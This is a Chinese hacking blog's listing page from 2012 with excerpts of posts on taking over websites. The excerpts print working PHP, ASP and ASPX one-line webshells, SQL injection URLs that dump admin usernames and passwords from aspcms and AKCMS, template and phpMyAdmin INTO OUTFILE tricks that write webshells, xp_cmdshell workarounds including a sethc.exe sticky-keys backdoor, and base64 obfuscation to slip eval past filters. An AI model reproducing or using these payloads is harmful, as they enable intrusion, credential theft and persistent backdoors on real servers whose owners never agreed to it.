上一页 1 ··· 7 8 9 10 11 12 13 14 15 ··· 30 下一页

2012年10月25日

可以突破Script 块缺少脚本关闭标记的一句话

摘要: asp一句话<%execute(request("SB"))%>"%><%execute(request("SB"))%><%'php一句话<?php eval($_POST[SB]);?>aspx一句话<% @Page Language="Jscript"%><%eval(Request.Item["SB"],"unsafe");%>突破防止闭合一句话:<%execute request(" 阅读全文

posted @ 2012-10-25 17:43 =_=! 阅读(1277) 评论(0) 推荐(0) 编辑

2012年10月13日

aspcms注入 cookies欺骗及修复

摘要: 漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制爆用户名/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..爆密码/plug/pr 阅读全文

posted @ 2012-10-13 21:54 =_=! 阅读(640) 评论(0) 推荐(0) 编辑

韩国gnuboard 4.32.11 之前版本注入0day

摘要: 韩国的一款流行的论坛程序gnuboard,以前有研究过,不过未搞出什么洞出来,前两天帮朋友搞看韩国站的时候目标站下面就用了 gnuboard版本是4.31.07的。版本比较低,记得以前国内貌似有公布过这个程序的注入,但当时搞的时候没有找到相关文献,于是对应目标版本去 官网下了源码自己研究了两天,终于搞了个cookie注入出来,而且不受GPC的影响。不过这个漏洞利用范围 不大,只针对4.32.11之前的版本,而且利用起来还有一定的局限,虽然不受GPC影响,但是注入要依赖mysql报错信息,韩国大部分的mysql版 本都比较低。这就使得我在测试的时候本地正常爆出字段内容,应用到实战的时候相同的语句 阅读全文

posted @ 2012-10-13 03:12 =_=! 阅读(711) 评论(0) 推荐(0) 编辑

2012年9月26日

细节决定成败

摘要: 拿站大家都知道最基本最常见的方法也就那么几种,用的最多的可能还就是那些程序的“0day”。毕竟一些中小型的网站不会去自己开发一套程序!8 Q) |5 u$ \. ?3 ~1 z8 k3 B即使有自己开发,安全方面也相对薄弱。也一定会用到一些第三方的程序,比如“编辑器” “投票程序”等。T00LS* H7 ~2 r2 Q( P. g$ H" B) L在拿站的时候我个人还是比较喜欢去“发现”利用这类程序。我个人认为这类程序要比靠“注入”更来的直接。 - 低调求发展/ w( _0 O* Q( f* i) O0 Y如果看一个站先从注入入手的话,我觉得是在走弯路。即使有注入,大多还是要得到权限 阅读全文

posted @ 2012-09-26 09:06 =_=! 阅读(184) 评论(0) 推荐(0) 编辑

2012年9月25日

phpmyadmin导出shell至中文路径

摘要: 1 set character_set_client='gbk';2 set character_set_connection='gbk';3 set character_set_database='gbk';4 set character_set_results='gbk';5 set character_set_server='gbk';6 select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\网站\mm.php&# 阅读全文

posted @ 2012-09-25 04:09 =_=! 阅读(209) 评论(0) 推荐(0) 编辑

AKCMS后台拿Webshell

摘要: 模板中写入以下内<{php}>fputs(fopen(“./0x80c.php”,”w”),”<?eval(\$_POST[0x80c]);?>”)<{/php}>然后管理员密码可以注入获取http://www.2cto.com /akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0×27,password,0×27, 阅读全文

posted @ 2012-09-25 04:06 =_=! 阅读(294) 评论(0) 推荐(0) 编辑

2012年9月21日

用Burp_suite快速处理上传截断

摘要: Burp suite 是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该读下以前的黑客X档案补习下了。由于该工具是通过Java写的,所以需要安装 JDK,关于 JDK 的安装,笔者简单介绍 下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键 ”我的电脑”->”属 性”->”高级”->”环境变量”,在系统变量中查找 Path,然后点击编辑,把 JDK 的 bin 目 录写在 path 的最后即可。如图 1图 1通过 CMD 执行下 jav 阅读全文

posted @ 2012-09-21 18:00 =_=! 阅读(640) 评论(0) 推荐(0) 编辑

2012年9月20日

mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

摘要: mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:1、替换shift文件(在开启3389情况下):下面两条语句为分别执行的。这条语句将explorer.exe复制为sethc.exedeclare @o int exec sp_oacreate 阅读全文

posted @ 2012-09-20 01:06 =_=! 阅读(1554) 评论(0) 推荐(0) 编辑

2012年9月14日

cacls.exe

摘要: xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)怎么解决、很简单的解决方法cmd 权限问题cacls.exe C:\WINdows\system32\cmd.exe /e /t /g system:FC:\Documents and Settings\Administrator>cacls.exe C:\WINdows\system32\cmd.exe /e /t /g system:F处理的文件: C:\WINdows\system32\cmd.exe处理的文件: C:\WINdows\system32\dllcache\cmd.execacls.ex 阅读全文

posted @ 2012-09-14 13:55 =_=! 阅读(412) 评论(0) 推荐(0) 编辑

2012年9月13日

php一句话猥琐流搞法

摘要: 在渗透中常常遇到拦截eval的,所以< ?php eval($_POST[xiao])?>这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式 < ?php $_GET['eval']($_POST['xiao']);?> 今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死去活来的,揍是怕人发现,压缩,加密,字符逆转,一句话,很烂了。 阅读全文

posted @ 2012-09-13 22:43 =_=! 阅读(345) 评论(0) 推荐(0) 编辑

上一页 1 ··· 7 8 9 10 11 12 13 14 15 ··· 30 下一页

导航